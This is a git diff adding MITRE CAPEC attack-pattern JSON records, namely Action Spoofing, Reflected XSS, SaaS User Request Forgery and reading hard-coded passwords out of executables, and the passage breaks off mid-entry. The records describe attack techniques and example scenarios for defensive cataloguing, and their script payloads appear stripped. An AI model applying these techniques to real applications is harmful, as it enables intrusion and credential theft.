capec/relationship/relationship--c10a2663-afd1-4155-837d-0204962bc33b.json create mode 100644 capec/relationship/relationship--c227b815-920b-4f06-a992-da5735203e11.json create mode 100644 capec/relationship/relationship--c2ed3542-975b-48fd-b65c-cec9e9046ead.json create mode 100644 capec/relationship/relationship--c32edb27-a6bf-4699-a91b-d5af0ea4c945.json create mode 100644 capec/relationship/relationship--c337d703-18ca-4ed6-8c29-8ed9b62345c2.json create mode 100644 capec/relationship/relationship--c373a9df-c5ca-4de1-bc88-a2ba81ddcf65.json create mode 100644 capec/relationship/relationship--c3f43923-aaf4-49f3-9671-2870eb851f3b.json create mode 100644 capec/relationship/relationship--c4a3ee46-a116-4224-a073-e75de578148d.json create mode 100644 capec/relationship/relationship--c4b71657-f6fb-4546-983e-8fd276338402.json create mode 100644 capec/relationship/relationship--c4fe5624-8c5e-4141-9db5-09a251aca913.json create mode 100644 capec/relationship/relationship--c5326510-c7fc-46a8-8c26-23e60ac15beb.json create mode 100644 capec/relationship/relationship--c56ba4aa-f3c0-4445-b600-e4a5f3b357a2.json create mode 100644 capec/relationship/relationship--c59c0b88-2a22-4feb-9521-220cbbe8a0c8.json create mode 100644 capec/relationship/relationship--c65ca8fe-0c7a-4e94-ba95-6e00da5b6f10.json create mode 100644 capec/relationship/relationship--c66a4576-2d04-4099-8a5c-91a340688c10.json create mode 100644 capec/relationship/relationship--c6e696a4-de63-4daf-ace7-92adb1fcb939.json create mode 100644 capec/relationship/relationship--c6ec2d76-e409-4f47-b91d-f0c14c2f7e28.json create mode 100644 capec/relationship/relationship--c6eff99c-44a6-4a6b-a24c-ee37b75d0d50.json create mode 100644 capec/relationship/relationship--c729dc55-a1b8-443c-bbc9-d4404dadda06.json create mode 100644 capec/relationship/relationship--c72d1e60-6f64-45ad-9ac1-bf091aeb1325.json create mode 100644 capec/relationship/relationship--c7501a8c-7f42-4536-8b86-125603eaba9d.json create mode 100644 capec/relationship/relationship--c7b26389-c529-4d2b-ad7b-e74fc65699db.json create mode 100644 capec/relationship/relationship--c7bb5a65-1cfa-4368-99de-417b00375584.json create mode 100644 capec/relationship/relationship--c872df25-83b3-49d5-bfa5-f1d177eee584.json create mode 100644 capec/relationship/relationship--c87904c0-cfe0-43b2-8962-79660b813dbd.json create mode 100644 capec/relationship/relationship--c997e17d-b481-44ab-8641-d268fc9964bb.json create mode 100644 capec/relationship/relationship--ca2c3223-2a6d-4d2b-9ea0-2990f3112c58.json create mode 100644 capec/relationship/relationship--ca6ddc66-5dac-4b75-8d8d-e0e6afed9e7c.json create mode 100644 capec/relationship/relationship--caa76434-7cae-42ce-9634-01b8f7882546.json create mode 100644 capec/relationship/relationship--cb112114-48b9-48c9-ac6d-3a22374a55cc.json create mode 100644 capec/relationship/relationship--cb17feb8-6d17-4b8c-b451-c4c2747dfa9e.json create mode 100644 capec/relationship/relationship--cb2731ed-1fd9-400f-892f-9a3168c06b92.json create mode 100644 capec/relationship/relationship--cb8e0fa8-9821-4987-a59e-d3b9c6e3481b.json create mode 100644 capec/relationship/relationship--cbda8fea-6328-4a87-acd6-4f41441bade8.json create mode 100644 capec/relationship/relationship--cc1c02e5-b81a-4280-874b-987523b1eb0d.json create mode 100644 capec/relationship/relationship--cc6e015d-75ba-4437-992c-d391fd8fe429.json create mode 100644 capec/relationship/relationship--cc96eadf-14e2-405b-b2b7-6f4b9f6fab4a.json create mode 100644 capec/relationship/relationship--cca4c79f-b73e-4b99-a721-6dceff911aa1.json create mode 100644 capec/relationship/relationship--cccb0e32-4f31-47b9-97ac-316107163645.json create mode 100644 capec/relationship/relationship--ccf3323d-a371-4ec9-8947-290aa02ec914.json create mode 100644 capec/relationship/relationship--cd2b2d1e-29d4-4ec5-9876-b210fdfded05.json create mode 100644 capec/relationship/relationship--cd90abb4-18df-4f14-b008-5157c2b99f68.json create mode 100644 capec/relationship/relationship--ce46e0f7-73b1-4efc-88f4-9df919fc2aac.json create mode 100644 capec/relationship/relationship--ce8b0873-e9de-4fc3-9331-a5fc5bdf683e.json create mode 100644 capec/relationship/relationship--cf0f24ae-b5cd-4c07-bda1-953830cf32e1.json create mode 100644 capec/relationship/relationship--cf1c4ee3-f9f4-4ee0-9298-e76477625c86.json create mode 100644 capec/relationship/relationship--cf66450b-3ba3-4f36-a971-e70bd18b40d6.json create mode 100644 capec/relationship/relationship--cf721c34-2455-49c9-87ab-611748f9729e.json create mode 100644 capec/relationship/relationship--cfb3d24c-1063-4fb7-b92d-fdf4f9fe78c6.json create mode 100644 capec/relationship/relationship--cfc78176-c50f-4529-ada7-323f4e9cd8d7.json create mode 100644 capec/relationship/relationship--cfe0adac-6b73-4dfe-91b4-5d01f64c0cc9.json create mode 100644 capec/relationship/relationship--d077bf67-717c-431d-8807-92f3e2097865.json create mode 100644 capec/relationship/relationship--d0bc5860-9b04-48da-a5f7-565401e455d0.json create mode 100644 capec/relationship/relationship--d19620bf-46ac-4d64-ade7-b75e7eb319ee.json create mode 100644 capec/relationship/relationship--d1abf586-d257-4a72-b14d-44f92a3e45f5.json create mode 100644 capec/relationship/relationship--d20b7e36-5317-45bc-9e89-762bbfa2dd1e.json create mode 100644 capec/relationship/relationship--d2218e8a-5035-416c-9762-451d807827d9.json create mode 100644 capec/relationship/relationship--d29c49cc-16e8-4c17-a5c2-5e4415d7b815.json create mode 100644 capec/relationship/relationship--d2deab8f-48e8-4479-95ee-7dab64bf8abf.json create mode 100644 capec/relationship/relationship--d33fd327-13cb-4adc-b807-9ff679445dad.json create mode 100644 capec/relationship/relationship--d34e4a9a-884e-4ede-8bb0-ecb72878cd9e.json create mode 100644 capec/relationship/relationship--d391abd9-19e1-4e4a-a3c0-913173953fbc.json create mode 100644 capec/relationship/relationship--d42da37c-5f9f-4437-ba40-8053ede73471.json create mode 100644 capec/relationship/relationship--d530cdcd-aa63-45a6-9fae-a6fccd7611f5.json create mode 100644 capec/relationship/relationship--d531c3c1-1da2-4094-ac85-c1a898def7c4.json create mode 100644 capec/relationship/relationship--d5acf000-e927-4934-baeb-fc883db06de3.json create mode 100644 capec/relationship/relationship--d5b57f85-6077-4111-b65e-7cd4e05b7a3d.json create mode 100644 capec/relationship/relationship--d61b1986-cb61-404b-950f-99e02127487b.json create mode 100644 capec/relationship/relationship--d67f7aa5-b8c0-4d6b-a352-e2014c2ab4a4.json create mode 100644 capec/relationship/relationship--d69e0751-1feb-4f2b-9ade-3cbd0a54df58.json create mode 100644 capec/relationship/relationship--d6a3f662-340c-48f9-b5b2-a29dea44f063.json create mode 100644 capec/relationship/relationship--d6d51161-5f82-4300-b109-a5e2b2b14bb6.json create mode 100644 capec/relationship/relationship--d7270969-0769-46e7-8213-d5b854f35036.json create mode 100644 capec/relationship/relationship--d77dd200-9428-4542-ac9f-78ad58d97e44.json create mode 100644 capec/relationship/relationship--d822a68b-f0d2-4ae6-8b1c-74f0fed06822.json create mode 100644 capec/relationship/relationship--d85cb99b-75fc-40b8-b479-a285d0aeb85a.json create mode 100644 capec/relationship/relationship--d8998cbe-e124-485a-85ca-beca9108afce.json create mode 100644 capec/relationship/relationship--d8bf5219-94ef-4829-bdad-7e05f03ae829.json create mode 100644 capec/relationship/relationship--d8f13ddc-c02e-4681-b7ee-7cad74447e96.json create mode 100644 capec/relationship/relationship--d970ad7b-bf7a-494f-bb14-0ad408590f7f.json create mode 100644 capec/relationship/relationship--d976aa2c-3f03-4383-b45e-c998a45082ec.json create mode 100644 capec/relationship/relationship--d9848bd9-0bf1-4cd7-a54d-6705d22774da.json create mode 100644 capec/relationship/relationship--d9a8c5e3-2477-43de-8f04-8f41783b7b35.json create mode 100644 capec/relationship/relationship--d9d4d723-586f-4c3a-a8b7-ca4c09b95834.json create mode 100644 capec/relationship/relationship--da069bcf-e3fc-45a2-8488-8326ecf63287.json create mode 100644 capec/relationship/relationship--da3beacf-86f4-48b1-b708-6d616e14a15e.json create mode 100644 capec/relationship/relationship--daa0a22b-2612-43c3-b60b-8550dfbbda10.json create mode 100644 capec/relationship/relationship--dac60376-221f-4f8b-8e87-6a9be6bbdd6d.json create mode 100644 capec/relationship/relationship--db1f1278-148e-4811-b44c-d2691ae606e0.json create mode 100644 capec/relationship/relationship--db7e558e-5af8-43b1-b4d1-5ce7a528a034.json create mode 100644 capec/relationship/relationship--dbdf4dc2-e842-48b0-9d02-06a0117f2b15.json create mode 100644 capec/relationship/relationship--dc0386a5-c653-4bb9-8148-ba86b01e0a0f.json create mode 100644 capec/relationship/relationship--dc195719-aaad-4810-9bd1-851dcc2aeb85.json create mode 100644 capec/relationship/relationship--dc8b3664-52e4-4864-ab89-3926d27aa304.json create mode 100644 capec/relationship/relationship--dcbfdd7f-940c-418e-a258-2899bf5c0316.json create mode 100644 capec/relationship/relationship--dcd48fbc-b429-4c89-b428-733efabf98b6.json create mode 100644 capec/relationship/relationship--dcdd89b0-3356-4eb7-abf5-64902536faa4.json create mode 100644 capec/relationship/relationship--dd1d2c3e-fd13-49f7-b0a1-0883915a3c74.json create mode 100644 capec/relationship/relationship--dd73c22b-5b7a-49c7-b1c0-26ea1711f627.json create mode 100644 capec/relationship/relationship--dd9e8510-5611-4488-84bd-6bdc3ac13dfe.json create mode 100644 capec/relationship/relationship--dda274ba-4e45-4ee8-8d58-f4416669e11b.json create mode 100644 capec/relationship/relationship--dea5e196-bc7b-418c-b405-7f8b242151fc.json create mode 100644 capec/relationship/relationship--dec10c5f-f312-48a3-8d6a-48d5939b0f00.json create mode 100644 capec/relationship/relationship--def22fd5-a3d1-4331-ab3c-a8637e40edff.json create mode 100644 capec/relationship/relationship--df34685d-a932-4704-9995-216ff7affeab.json create mode 100644 capec/relationship/relationship--dfdc35bd-a773-482e-b52a-f7bb560b8f97.json create mode 100644 capec/relationship/relationship--e0c29fae-f715-4f15-9b29-78c6871a310b.json create mode 100644 capec/relationship/relationship--e12c9fb3-9901-43eb-8175-dac851b91921.json create mode 100644 capec/relationship/relationship--e17c61dc-f469-462d-9568-39ce472f17a4.json create mode 100644 capec/relationship/relationship--e18da919-cf74-4285-8858-382596037a0b.json create mode 100644 capec/relationship/relationship--e281db8d-4ac2-467b-a5f5-aae48f2fd6b8.json create mode 100644 capec/relationship/relationship--e2c89b6f-acd9-4d5d-8774-36cec7da6a5f.json create mode 100644 capec/relationship/relationship--e3437db4-9065-421c-9b17-0a4e607042a2.json create mode 100644 capec/relationship/relationship--e355a8ca-9f3a-48fa-8f9a-a92ed321ed1d.json create mode 100644 capec/relationship/relationship--e3b59227-9abe-4f53-929d-a30a0f1c33a1.json create mode 100644 capec/relationship/relationship--e4059f56-d33f-4125-a86c-21511b62d57a.json create mode 100644 capec/relationship/relationship--e46a2581-471f-4b3c-8faa-5bc70e339312.json create mode 100644 capec/relationship/relationship--e46dedda-2a12-4e24-a23c-ff80c6a382c3.json create mode 100644 capec/relationship/relationship--e48f7336-578e-443a-8eda-088c9b4ccb4d.json create mode 100644 capec/relationship/relationship--e53caf75-e408-4906-8048-06afdbab160f.json create mode 100644 capec/relationship/relationship--e54b555f-10e3-4a42-b769-0664f0a2ff3c.json create mode 100644 capec/relationship/relationship--e5f11d4b-2865-4d54-9f57-ad416f4ae3b3.json create mode 100644 capec/relationship/relationship--e6867382-02a5-45fe-aff0-11c524c9b7d3.json create mode 100644 capec/relationship/relationship--e6cf1bc0-0177-4b9d-b823-0a767fc6a2b3.json create mode 100644 capec/relationship/relationship--e7276d74-feac-40c8-8ef2-317d1eb3ac80.json create mode 100644 capec/relationship/relationship--e74697e0-2f05-4c6e-aee7-ce34e30ac2a0.json create mode 100644 capec/relationship/relationship--e9aa7abb-e935-4be6-8e9f-cd6c1f042120.json create mode 100644 capec/relationship/relationship--ea2abd6b-96e4-435c-a8dd-b19f7bce8721.json create mode 100644 capec/relationship/relationship--ea3cdbc2-1ee8-412f-8053-7535c1ee1e7b.json create mode 100644 capec/relationship/relationship--ea719cfb-76a9-4d7d-9224-274811c7d7ac.json create mode 100644 capec/relationship/relationship--ea844e99-746b-4c68-91c3-e9b33a0de653.json create mode 100644 capec/relationship/relationship--eaca4f22-bac1-4cc3-8e40-2ee1dd484078.json create mode 100644 capec/relationship/relationship--eae7fdc2-a9a8-4d5e-9a24-769a58a5cdc0.json create mode 100644 capec/relationship/relationship--eb359e19-953c-4676-b70c-7988d4e41952.json create mode 100644 capec/relationship/relationship--eb3a7a0f-6512-45a1-a711-855fa3d9856c.json create mode 100644 capec/relationship/relationship--eba54b7c-685e-4917-a4d8-2ad388f9d918.json create mode 100644 capec/relationship/relationship--ebb70aa9-33c4-45e4-9139-554675520760.json create mode 100644 capec/relationship/relationship--ec559739-62b4-400d-b852-db5c7a71f248.json create mode 100644 capec/relationship/relationship--ec9fd5bc-7801-4acd-bcd5-18947ec8d217.json create mode 100644 capec/relationship/relationship--eca6e1f0-5c98-4ae9-8052-e029952bbe26.json create mode 100644 capec/relationship/relationship--ecc3568c-6e06-473e-b126-2c18dec93b5d.json create mode 100644 capec/relationship/relationship--ed190e5e-e0e7-458b-8f5b-c30d9de7993a.json create mode 100644 capec/relationship/relationship--ed20bf5f-6738-4a0d-be2a-9a43fc2b397c.json create mode 100644 capec/relationship/relationship--ed61e4e1-5489-4563-9d23-1866ea877661.json create mode 100644 capec/relationship/relationship--edd38d2f-4f92-4c3a-9d39-82a5810b2cd5.json create mode 100644 capec/relationship/relationship--ede2474f-657d-48e4-a372-3ac38faf2123.json create mode 100644 capec/relationship/relationship--ee78fdd8-4fe3-4b08-8cca-cbccb81b05cf.json create mode 100644 capec/relationship/relationship--ef120778-1411-4dba-ae54-ead16af74f16.json create mode 100644 capec/relationship/relationship--ef36ffdd-7029-4bef-93d9-67a65dd90444.json create mode 100644 capec/relationship/relationship--efacb91b-c8b4-4a7d-b2b4-b9f74851d2ba.json create mode 100644 capec/relationship/relationship--efe380b7-2bc1-4a1a-8bbd-cf79afddb8e8.json create mode 100644 capec/relationship/relationship--f01e1863-7f77-4d86-a3dd-42542b82e1f8.json create mode 100644 capec/relationship/relationship--f044155f-cc90-402f-8a90-33dfa66446c3.json create mode 100644 capec/relationship/relationship--f0562beb-5a29-416e-bdec-f1c183db6237.json create mode 100644 capec/relationship/relationship--f17d2dbc-4dda-4687-82f4-b1365fd82e11.json create mode 100644 capec/relationship/relationship--f18a5424-9f62-4d5d-96d0-a4fe39121c41.json create mode 100644 capec/relationship/relationship--f1b706da-f3ca-46f8-ba74-f37311cd7149.json create mode 100644 capec/relationship/relationship--f2468477-632c-4a1b-be8c-e9ff89965aff.json create mode 100644 capec/relationship/relationship--f28ab700-0168-496d-9772-5d1cad1532b7.json create mode 100644 capec/relationship/relationship--f2bbfee3-f2c6-498e-a90f-ab054df7d912.json create mode 100644 capec/relationship/relationship--f33b663c-4618-4a6a-9407-e3a6753e3ce5.json create mode 100644 capec/relationship/relationship--f350a84b-fb24-4e17-860a-7a8661a662a0.json create mode 100644 capec/relationship/relationship--f3536738-ef95-497f-9419-9e845e1a4fe3.json create mode 100644 capec/relationship/relationship--f3d0e095-dd5e-4765-ae7e-755163a4687a.json create mode 100644 capec/relationship/relationship--f42cc4b9-2a4a-4f0e-90f9-b6004443f1d0.json create mode 100644 capec/relationship/relationship--f47e6dc7-0c11-4423-8905-ce9233c8aa56.json create mode 100644 capec/relationship/relationship--f4dde5ab-520a-4b4e-a483-a8f50e447dbf.json create mode 100644 capec/relationship/relationship--f4f5521b-dcf2-48f8-8087-5626b06446ca.json create mode 100644 capec/relationship/relationship--f51e8b12-d41f-489c-a654-8867e6f3e015.json create mode 100644 capec/relationship/relationship--f578d9fb-fe71-48f7-8fbb-d45167ed1846.json create mode 100644 capec/relationship/relationship--f5987f26-b520-4611-9955-47308a4ab228.json create mode 100644 capec/relationship/relationship--f5a9f1e7-823a-4866-b736-cb4ae25c5ec8.json create mode 100644 capec/relationship/relationship--f5b48029-c434-4493-8aed-e71719117926.json create mode 100644 capec/relationship/relationship--f5c0ea9b-986b-4c21-8bad-07b3b2877a81.json create mode 100644 capec/relationship/relationship--f730b1cf-6be9-4267-83a3-bafb3298183d.json create mode 100644 capec/relationship/relationship--f7328c84-cf21-40c0-9a07-aa393b67ce63.json create mode 100644 capec/relationship/relationship--f85f68b6-6f23-4af9-83cd-87d22db28551.json create mode 100644 capec/relationship/relationship--f8ea324e-3205-4840-9f4d-882dd1653a69.json create mode 100644 capec/relationship/relationship--f8fcdbfa-108d-4232-b020-a5c907dc809b.json create mode 100644 capec/relationship/relationship--f9e4c464-be58-41c0-9a77-ccfdc854a000.json create mode 100644 capec/relationship/relationship--fa4ed481-62ad-4d79-a2fc-64104574eeff.json create mode 100644 capec/relationship/relationship--fad1edac-f0a5-48d7-b651-4d1eb2869a8c.json create mode 100644 capec/relationship/relationship--fafda083-84e0-40e7-8e6d-dd060d98f9a0.json create mode 100644 capec/relationship/relationship--fb58982e-6527-4113-bd7c-61aa753ad5b1.json create mode 100644 capec/relationship/relationship--fb7a7520-3f18-4bee-b0cd-8e8bd6589311.json create mode 100644 capec/relationship/relationship--fc5ddb13-a8bc-48f6-9bf0-d88a106a5170.json create mode 100644 capec/relationship/relationship--fc7c7cca-edd7-4b8f-9557-499a5368bd78.json create mode 100644 capec/relationship/relationship--fcc957ee-8c3a-4698-b94d-30863757d021.json create mode 100644 capec/relationship/relationship--fd5b21d9-bbc6-4c2d-bcc2-1d828f360a86.json create mode 100644 capec/relationship/relationship--fdb93c2f-f884-40a4-89c2-5cf4510641f0.json create mode 100644 capec/relationship/relationship--fea61934-d6b2-4519-87c4-ec48ad2536e2.json create mode 100644 capec/relationship/relationship--feb130f4-7a68-43cd-9a77-10d60e95475f.json create mode 100644 capec/relationship/relationship--fec84e5e-c761-451c-8652-d4fd2a29e922.json create mode 100644 capec/relationship/relationship--fed76d01-7c49-48d9-8fa0-6fbdcd09ac9b.json create mode 100644 capec/relationship/relationship--feecba9f-ded0-410b-9f23-51c5b3b5dcae.json create mode 100644 capec/relationship/relationship--ff9f1927-dbeb-401a-8f36-cfeebad3521d.json create mode 100644 capec/relationship/relationship--ffdbbef1-9cc0-4d00-8cdb-0e437e9e149e.json create mode 100644 capec/relationship/relationship--ffe18c13-75af-4579-9329-168b3296cf71.json diff --git a/.gitignore b/.gitignore index 2be5d2b821..e2f1af6a01 100644 --- a/.gitignore +++ b/.gitignore @@ -1,2 +1,3 @@ hashes.json *.pyc +.DS_Store diff --git a/capec/attack-pattern/attack-pattern--0278e44f-8fb4-4c02-bde1-0ccbe12a1b15.json b/capec/attack-pattern/attack-pattern--0278e44f-8fb4-4c02-bde1-0ccbe12a1b15.json new file mode 100644 index 0000000000..a3a5b8090e --- /dev/null +++ b/capec/attack-pattern/attack-pattern--0278e44f-8fb4-4c02-bde1-0ccbe12a1b15.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--db1938e8-6414-4189-a402-067ef5c5c6d0", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--0278e44f-8fb4-4c02-bde1-0ccbe12a1b15", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "Action Spoofing", + "description": "An adversary is able to disguise one action for another and therefore trick a user into initiating one type of action when they intend to initiate a different action. For example, a user might be led to believe that clicking a button will submit a query, but in fact it downloads software. Adversaries may perform this attack through social means, such as by simply convincing a victim to perform the action or relying on a user's natural inclination to do so, or through technical means, such as a clickjacking attack where a user sees one interface but is actually interacting with a second, invisible, interface.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/173.html", + "external_id": "CAPEC-173" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Other (Action spoofing can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ], + "Confidentiality": [ + "Other (Action spoofing can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ], + "Integrity": [ + "Other (Action spoofing can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ] + }, + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary must convince the victim into performing the decoy action.", + "The adversary must have the means to control a user's interface to present them with a decoy action as well as the actual malicious action. Simple versions of this attack can be performed using web pages requiring only that the adversary be able to host (or control) content that the user visits." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--0296edfb-74a9-4c12-876a-a7371b585f4a.json b/capec/attack-pattern/attack-pattern--0296edfb-74a9-4c12-876a-a7371b585f4a.json new file mode 100644 index 0000000000..ae9c0e799f --- /dev/null +++ b/capec/attack-pattern/attack-pattern--0296edfb-74a9-4c12-876a-a7371b585f4a.json @@ -0,0 +1,76 @@ +{ + "type": "bundle", + "id": "bundle--736e1ec5-6a32-4902-922d-361941249d6b", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--0296edfb-74a9-4c12-876a-a7371b585f4a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-04-15T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Reflected XSS", + "description": "This type of attack is a form of Cross-Site Scripting (XSS) where a malicious script is \"reflected\" off a vulnerable web application and then executed by a victim's browser. The process starts with an adversary delivering a malicious script to a victim and convincing the victim to send the script to the vulnerable web application. The most common method of this is through a phishing email where the adversary embeds the malicious script with a URL that the victim then clicks on. In processing the subsequent request, the vulnerable web application incorrectly considers the malicious script as valid input and uses it to creates a reposnse that is then sent back to the victim. To launch a successful Reflected XSS attack, an adversary looks for places where user-input is used directly in the generation of a response. This often involves elements that are not expected to host scripts such as image tags (), or the addition of event attibutes such as onload and onmouseover. These elements are often not subject to the same input validation, output encoding, and other content filtering and checking routines.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/591.html", + "external_id": "CAPEC-591" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html", + "external_id": "CWE-79" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Watchfire Research, XSS vulnerabilities in Google.com, Full Disclosure mailing list archives", + "url": "http://seclists.org/fulldisclosure/2005/Dec/1107", + "external_id": "REF-476" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges (A successful Reflected XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Authorization": [ + "Gain Privileges (A successful Reflected XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Availability": [ + "Execute Unauthorized Commands (A successful Reflected attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Confidentiality": [ + "Read Data (A successful Reflected XSS attack can enable an adversary to exfiltrate sensitive information from the application.)", + "Gain Privileges (A successful Reflected XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)", + "Execute Unauthorized Commands (A successful Reflected attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (A successful Reflected attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)", + "Modify Data (A successful Reflected attack can allow an adversary to tamper with application data.)" + ] + }, + "x_capec_example_instances": [ + "\n Consider a web application that enables or disables some of the fields of a form on the page via the use of a mode parameter provided on the query string.\n http://my.site.com/aform.html?mode=full\n The application\u2019s server-side code may want to display this mode value in the HTML page being created to give the users an understanding of what mode they are in. In this example, PHP is used to pull the value from the URL and generate the desired HTML.\n \n Notice how the value provided on the URL is used directly with no input validation performed and no output encoding in place. A maliciously crafted URL can thus be formed such that if a victim clicked on the URL, a malicious script would then be executed by the victim\u2019s browser:\n http://my.site.com/aform.html?mode=\n ", + "\n Reflected XSS attacks can take advantage of HTTP headers to compromise a victim. For example, assume a vulnerable web application called \u2018mysite\u2019 dynamically generates a link using an HTTP header such as HTTP_REFERER. Code somewhere in the application could look like:\n Test URL\"?>\n The HTTP_REFERER header is populated with the URI that linked to the currently executing page. A web site can be created and hosted by an adversary that takes advantage of this by adding a reference to the vulnerable web application. By tricking a victim into clicking a link that executes the attacker\u2019s web page, such as:\n \"http://attackerswebsite.com?\"\n The vulnerable web application ('mysite') is now called via the attacker's web site, initiated by the victim's web browser. The HTTP_REFERER header will contain a malicious script, which is embedded into the page by the vulnerable application and served to the victim. The victim\u2019s web browser then executes the injected script, thus compromising the victim\u2019s machine.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "An application that leverages a client-side web browser with scripting enabled.", + "An application that fail to adequately sanitize or encode untrusted input." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Requires the ability to write malicious scripts and embed them into HTTP requests." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--02ea234a-137e-4e2c-b0d6-9eaba93746fc.json b/capec/attack-pattern/attack-pattern--02ea234a-137e-4e2c-b0d6-9eaba93746fc.json new file mode 100644 index 0000000000..580081f473 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--02ea234a-137e-4e2c-b0d6-9eaba93746fc.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--eb3d2a8a-9fae-44d1-b3d9-6179fd0ee633", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--02ea234a-137e-4e2c-b0d6-9eaba93746fc", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "SaaS User Request Forgery", + "description": "An adversary, through a previously installed malicious application, performs malicious actions against a third-party Software as a Service (SaaS) application (also known as a cloud based application) by leveraging the persistent and implicit trust placed on a trusted user's session. This attack is executed after a trusted user is authenticated into a cloud service, \"piggy-backing\" on the authenticated session, and exploiting the fact that the cloud service believes it is only interacting with the trusted user. If successful, the actions embedded in the malicious application will be processed and accepted by the targeted SaaS application and executed at the trusted user's privilege level.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/510.html", + "external_id": "CAPEC-510" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html", + "external_id": "CWE-346" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Ami Luttwak, A new Zeus variant targeting Salesforce.com \u2013 Research and Analysis, Adallom, Inc.", + "url": "http://www.adallom.com/blog/a-new-zeus-variant-targeting-salesforce-com-accounts-research-and-analysis/", + "external_id": "REF-438" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "An adversary must be able install a purpose built malicious application onto the trusted user's system and convince the user to execute it while authenticated to the SaaS application." + ], + "x_capec_skills_required": { + "Medium": "This attack pattern often requires the technical ability to modify a malicious software package (e.g. Zeus) to spider a targeted site and a way to trick a user into a malicious software download." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--02f28ad7-180e-4f98-9716-1ae8851748da.json b/capec/attack-pattern/attack-pattern--02f28ad7-180e-4f98-9716-1ae8851748da.json new file mode 100644 index 0000000000..2f86580975 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--02f28ad7-180e-4f98-9716-1ae8851748da.json @@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--006f9c2b-8dba-44a2-82e6-7eb976be82fe", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--02f28ad7-180e-4f98-9716-1ae8851748da", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Read Sensitive Strings Within an Executable", + "description": "An adversary engages in activities to discover any sensitive strings are present within the compiled code of an executable, such as literal ASCII strings within the file itself, or possibly strings hard-coded into particular routines that can be revealed by code refactoring methods including static and dynamic analysis. One specific example of a sensitive string is a hard-coded password. Typical examples of software with hard-coded passwords include server-side executables which may check for a hard-coded password or key during a user's authentication with the server. Hard-coded passwords can also be present in client-side executables which utilize the password or key when connecting to either a remote component, such as a database server, licensing server, or otherwise, or a processes on the same host that expects a key or password. When analyzing an executable the adversary may search for the presence of such strings by analyzing the byte-code of the file itself. Example utilities for revealing strings within a file include 'strings,' 'grep,' or other variants of these programs depending upon the type of operating system used. These programs can be used to dump any ASCII or UNICODE strings contained within a program. Strings can also be searched for using a hex editors by loading the binary or object code file and utilizing native search functions such as regular expressions.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/191.html", + "external_id": "CAPEC-191" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/798.html", + "external_id": "CWE-798" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "url": "http://en.wikipedia.org/wiki/Decompiler", + "external_id": "REF-51" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "url": 